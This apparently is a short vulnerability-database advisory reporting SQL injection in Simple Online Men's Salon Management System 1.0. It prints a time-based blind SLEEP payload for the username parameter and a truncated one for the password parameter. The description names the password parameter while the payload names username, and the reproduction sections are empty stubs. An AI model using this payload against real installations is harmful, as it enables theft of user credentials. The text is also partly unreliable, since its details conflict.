Monday, December 6, 2021

Simple Online Men's Salon Management System 1.0 SQL Injection

## [MSMS](

## [Vendor](


## Description
The `password` parameter on MSMS 1.0 appears to be vulnerable to SQL
injection attacks. The predictive tests of this application interacted
with that domain, indicating that the injected SQL query was executed.
The attacker can retrieve all authentication and
information about the users of this system.

## Payload

Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=hacked' AND (SELECT 5469 FROM
(SELECT(SLEEP(5)))kYFm) AND 'eRWi'='eRWi&password=y3L!z9j!P2'+(select

## Reproduce:

## Proof and Exploit:

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore